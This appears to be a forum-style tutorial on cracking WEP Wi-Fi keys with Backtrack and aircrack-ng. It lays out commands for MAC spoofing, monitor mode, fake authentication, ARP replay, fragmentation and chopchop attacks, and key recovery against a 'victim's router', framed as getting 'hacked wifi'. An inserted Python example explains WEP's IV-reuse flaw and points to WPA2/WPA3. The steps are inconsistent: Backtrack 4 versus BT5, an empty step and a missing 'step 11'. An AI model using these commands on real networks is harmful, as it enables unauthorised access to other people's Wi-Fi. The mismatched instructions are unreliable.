WEP cracking - 10 easy steps ?

WEP Cracking with Backtrack

First, you will need to have Backtrack 4 (LINK)
*** I find that if you are smart enough to be into hacking you will at least know how to burn an image file to a DVD, so after you do that, boot up the DVD and run BT4.

Login: root

Password: toor

Once logged in, type in: startx
BT5 r3 is now set up; here are the steps to follow.


1. Open konsole and type the following to start up network connections.

/etc/init.d/networking start

2. Now we are going to put the network card into monitor mode by typing the following.


3. So first start up the scan

airmon-ng start wlan0 or 1

(depends on what it reads your card as, replace as needed)

4. Let's spoof your MAC address first by typing this next command.

ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up

This will make it so we change our MAC address to the computer we are connecting to

5. Time to start finding our victim's router; type in konsole:

airodump-ng mon0

This will show the list, and once you find one that suits your interest, continue.

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole

airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)

example: airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w wepcap mon0

7. Let's start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this, open a new konsole and type:

aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0

8. Almost done, we just need to continue the ARP cycle. Open another konsole and type:

aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.

Collect a good amount of IVs, around 20k to 50k. Once it's there, press CTRL - C to stop the process and continue to 9.

9. Time to start cracking that cap file :D Open a new konsole and type.

aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng -b 11:22:33:44:55:66 wepcap-01.cap

10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)
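
Why the 24-bit IV counted in steps 7 and 8 is a design flaw, as an added Python example (not from the original post, and not the key-recovery method aircrack-ng uses): WEP seeds RC4 with IV || key, so two frames with the same IV share a keystream, and the IV space is small enough that repeats are expected within the frame counts mentioned above. The key, payloads and function names are constructed for illustration, and the frame layout is simplified.

```python
import math
import struct
import zlib

IV_SPACE = 2 ** 24  # WEP's IV is 24 bits and is sent unencrypted in every frame


def rc4(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream."""
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Simplified WEP body: clear IV, then RC4(IV || key) over data + CRC-32 ICV.
    The key-ID byte and the 802.11 headers are left out."""
    body = plaintext + struct.pack("<I", zlib.crc32(plaintext))
    return iv + xor(body, rc4(iv + key, len(body)))


def same_iv_leaks_xor(iv1: bytes, iv2: bytes) -> bool:
    """True when XOR of the two ciphertexts equals XOR of the two plaintexts."""
    key = bytes.fromhex("0987654321")  # constructed 40-bit key
    p1, p2 = b"GET /index.html ", b"user=alice&pin=1"  # constructed payloads
    c1, c2 = wep_encrypt(iv1, key, p1), wep_encrypt(iv2, key, p2)
    return xor(c1[3:3 + len(p1)], c2[3:3 + len(p2)]) == xor(p1, p2)


def iv_repeat_probability(frames: int) -> float:
    """Birthday approximation: chance that random IVs repeat within `frames`."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2 * IV_SPACE))


if __name__ == "__main__":
    print("same IV leaks p1^p2:", same_iv_leaks_xor(b"\x00\x00\x01", b"\x00\x00\x01"))
    print("different IV leaks :", same_iv_leaks_xor(b"\x00\x00\x01", b"\x00\x00\x02"))
    for n in (5000, 20000, 50000):
        print(n, "frames -> P(IV repeat) =", round(iv_repeat_probability(n), 4))
```

A longer WEP key does not change the 24-bit IV, so the fix on the network side is to move the access point to WPA2 or WPA3 rather than to lengthen the WEP key.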

Here are some alternate methods from the Backtrack tutorial that are interesting and work too.

1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k -l -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap

1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK

***Be sure to open new Konsoles when necessary***

Key Commands.

wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor = The * being replaced by a number (Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

thanks, Ok
